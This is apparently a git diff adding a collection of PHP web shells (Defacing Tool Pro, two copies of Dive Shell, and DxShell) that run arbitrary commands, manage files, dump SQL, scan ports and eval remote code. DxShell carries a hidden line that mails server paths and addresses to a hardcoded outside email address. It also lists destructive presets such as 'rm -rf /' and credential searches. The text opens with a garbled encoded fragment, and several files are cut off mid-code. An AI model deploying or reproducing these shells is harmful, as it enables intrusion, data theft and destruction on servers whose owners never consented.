o9kxT/E~?byn'EGv~;WVK.P{PBwooswsE@*@!4@*~µ,@!&4@*@!zwWUO@*@!z/n	YnD@*E@#@&@#@&uJ9cAA==^#~@%>
diff --git a/php/DTool Pro.php b/php/DTool Pro.php
new file mode 100644
index 0000000..0799e5e
--- /dev/null
+++ b/php/DTool Pro.php	
@@ -0,0 +1,198 @@
+xterm at /usr/X11R6/bin/xterm, ";
+if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, ";
+if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, ";
+if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, ";
+if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, ";
+if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc ";
+$safe = @ini_get($safemode);
+if ($safe) $pro8="safe_mode: YES, "; else $pro7="safe_mode: NO, ";
+$pro8 = "PHP ".phpversion();
+$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
+$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
+$ip=@gethostbyname($_SERVER['HTTP_HOST']);
+
+//Turns the 'ls' command more usefull, showing it as it looks in the shell
+if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
+else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
+else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
+else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
+else if($cmd=='ls') $cmd = "ls -F";
+
+//If there are some '//' in the cmd, its now removed
+if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+?>
+
+
+
+
+
+
+
+
+
+
    [ Defacing Tool Pro v ] ?
    
+by r3v3ng4ns - revengans@gmail.com 
+
    
+
+
+
+
+
+
+
+
+
    : 
    user: uid() euid() gid()
    write permission:YES"; }else{ echo " no"; } ?>
    server info: 
    pro info: ip 
    original path: 
    current path: 
+
    
+
    
+
+
    command
    		
+
+
    
+ array("pipe", "r"),1 => array("pipe", "w"),2 => array("pipe", "w"),)){
+	$process = @proc_open("$what",$descpec,$pipes);
+	if (is_resource($process)) {
+		fwrite($pipes[0], "");
+		fclose($pipes[0]);
+
+		while(!feof($pipes[2])) {
+			$erro_retorno = fgets($pipes[2], 4096);
+			if(!empty($erro_retorno)) echo $erro_retorno;//isso mostra tds os erros
+		}
+    		fclose($pipes[2]);
+
+		while(!feof($pipes[1])) {
+			echo fgets($pipes[1], 4096);
+		}
+		fclose($pipes[1]);
+
+		$ok_p_fecha = @proc_close($process);
+	}else echo "It seems that this PHP version (".phpversion().") doesn't support proc_open() function";
+}else echo "This PHP version ($pro7) doesn't have the proc_open() or this function is disabled by php.ini";
+}
+
+$funE="function_exists";
+if($safe){$fe="safemode";$feshow=$fe;}
+elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
+elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
+elseif($funE('system')){$fe="system";$feshow=$fe;}
+elseif($funE('exec')){$fe="execc";$feshow="exec";}
+elseif($funE('popen')){$fe="popenn";$feshow="popen";}
+elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
+else {$fe="nofunction";$feshow=$fe;}
+if($fu!="0" or !empty($fu)){
+  if($fu==1){$fe="passthru";$feshow=$fe;}
+  if($fu==2){$fe="system";$feshow=$fe;}
+  if($fu==3){$fe="execc";$feshow="exec";}
+  if($fu==4){$fe="popenn";$feshow="popen";}
+  if($fu==5){$fe="shell";$feshow="shell_exec";}
+  if($fu==6){$fe="procc";$feshow="proc_open";}
+}
+$fe("$cmd 2>&1");
+$output=ob_get_contents();ob_end_clean();
+?>
+

    
+
+

    stdOut from $cmdShow\", using $feshow()";?>
    
+
    
+
diff --git a/php/Dive Shell 1.0 - Emperor Hacking Team.php b/php/Dive Shell 1.0 - Emperor Hacking Team.php
new file mode 100644
index 0000000..9c6d47e
--- /dev/null
+++ b/php/Dive Shell 1.0 - Emperor Hacking Team.php	
@@ -0,0 +1,187 @@
+ array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '' . "\n";
+?>
+
+
+  Dive Shell - Emperor Hacking Team
+  
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
     Directory:  
+
+
    
+
+
    
+
    
+  
    
+  Command:
+    
+  
+    
    
+
    
+  Rows:  
+  
    
+
    
+  Edited By Emperor Hacking Team
    
+
    
+  iM4n - FarHad - imm02tal - R$P
    
+
    
+
    
+
+
+
    
+    
+  
    
+
+
+
+
\ No newline at end of file
diff --git a/php/Dive_Shell_1.0_Emperor_Hacking_Team.php b/php/Dive_Shell_1.0_Emperor_Hacking_Team.php
new file mode 100644
index 0000000..1e90f46
--- /dev/null
+++ b/php/Dive_Shell_1.0_Emperor_Hacking_Team.php
@@ -0,0 +1,187 @@
+ array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '' . "\n";
+?>
+
+
+  Dive Shell - Emperor Hacking Team
+  
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
     Directory:  
+
+
    
+
+
    
+
    
+  
    
+  Command:
+    
+  
+    
    
+
    
+  Rows:  
+  
    
+
    
+  Edited By Emperor Hacking Team
    
+
    
+  iM4n - FarHad - imm02tal - R$P
    
+
    
+
    
+
+
+
    
+    
+  
    
+
+
+
+
diff --git a/php/Dx.php b/php/Dx.php
new file mode 100644
index 0000000..ebca7b5
--- /dev/null
+++ b/php/Dx.php
@@ -0,0 +1,2026 @@
+	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = escapeshellarg($f);
+			return trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
